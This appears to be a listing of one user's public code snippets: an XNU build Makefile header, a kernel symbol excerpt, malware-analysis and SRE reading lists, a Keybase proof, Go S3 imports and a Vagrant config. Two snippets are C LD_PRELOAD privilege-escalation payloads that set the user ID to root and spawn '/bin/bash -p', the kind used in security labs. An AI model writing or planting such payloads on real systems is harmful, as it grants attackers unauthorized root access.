lucasallan

# -*- mode: makefile;-*-
#
# Apple XNU build prep
# Jeremy C. Andrus
#
# This Makefile contains commands necessary to download
# and build the XNU kernel for macOS High Sierra through
# Mojave. It will not actually build XNU, but it will
# build and install all of the prerequisites.
#

lucasallan

0000000000000000 A irq_stack_union
0000000000000000 A __per_cpu_start
0000000000004000 A init_tss
0000000000004000 A __per_cpu_user_mapped_start
0000000000007000 A exception_stacks
000000000000c000 A gdt_page
000000000000d000 A kaiser_scratch
000000000000d010 A spec_ctrl_pcp
000000000000d040 A kaiser_enabled_pcp
000000000000d080 A cpu_debug_store

lucasallan

#include <stdio.>
#include <sys/types.h>
#include <stdlib.h>

static void hack() __attribute__((constructor));

void hack(){
  unsetenv("LD_PRELOAD");
  setresuid(0,0,0);
  system("/bin/bash -p");

lucasallan

#include <stdio.>
#include <sys/types.h>
#include <stdlib.h>

void _init(){
  unsetenv("LD_PRELOAD");
  setresuid(0,0,0);
  system("/bin/bash -p");
}

lucasallan

1. http://computer-forensics.sans.org/blog/2010/11/12/get-started-with-malware-analysis
2. http://zeltser.com/malware-analysis-toolkit/
3. http://zeltser.com/vmware-malware-analysis/
4. http://computer-forensics.sans.org/blog/2010/10/11/3-phases-malware-analysis-behavioral-code-memory-forensics/
5. BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection https://www.usenix.org/legacy/event/sec08/tech/full_papers/gu/gu.pdf
6. Mining the Network Behavior of Bots http://isg.rhul.ac.uk/sullivan/pubs/tr/2009-12.pdf
7. Behavioral Clustering of HTTP-Based Malware and Signature Generation Using Malicious Network Traces https://www.usenix.org/legacy/event/nsdi10/tech/full_papers/perdisci.pdf
8. From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final127.pdf
9. Obfuscation of executable code to improve resistance to static disassembly http://www.cs.arizona.edu/~debray/Pub

lucasallan

Some books I've been studying to improve my skills as a SRE/System Engineer.

• Site Reliability Engineering: How Google Runs Production Systems
• Operating Systems
• Operating Systems: Three Easy Pieces
• How Linux Works, 2nd Edition
• Continuous Delivery: Reliable Software Releases through Build, Test, and Deployment Automation
• [Systems Performance: Enterprise and the Cloud](https://www.amazon.com/gp/product/0133390098?ie=UTF8&tag=deirdrestraug-20&linkCode=as2&camp=1789&creative=390957&creativ

lucasallan

Keybase proof

I hereby claim:

• I am lucasallan on github.
• I am lucasa (https://keybase.io/lucasa) on keybase.
• I have a public key ASALx1cBTDTtDeNmQ85Wv40BePGxdqerkX5uU27TTljZgwo

To claim this, I am signing this object:

lucasallan

package main

import (
	"bytes"
	"fmt"
	"io/ioutil"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/service/s3"

lucasallan

package main

import (
	"bytes"
	"fmt"
	"io/ioutil"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/service/s3"

lucasallan

Vagrant.configure('2') do |config|
    config.vm.box = "ubuntu/xenial64" # Ubuntu 16.04

    # fix issues with slow dns http://serverfault.com/a/595010
    config.vm.provider :virtualbox do |vb, override|
        vb.customize ["modifyvm", :id, "--natdnshostresolver1", "on"]
        vb.customize ["modifyvm", :id, "--natdnsproxy1", "on"]
        vb.customize ["modifyvm", :id, "--memory", "4096"]
        vb.customize ["modifyvm", :id, "--cpus", "4"]
    end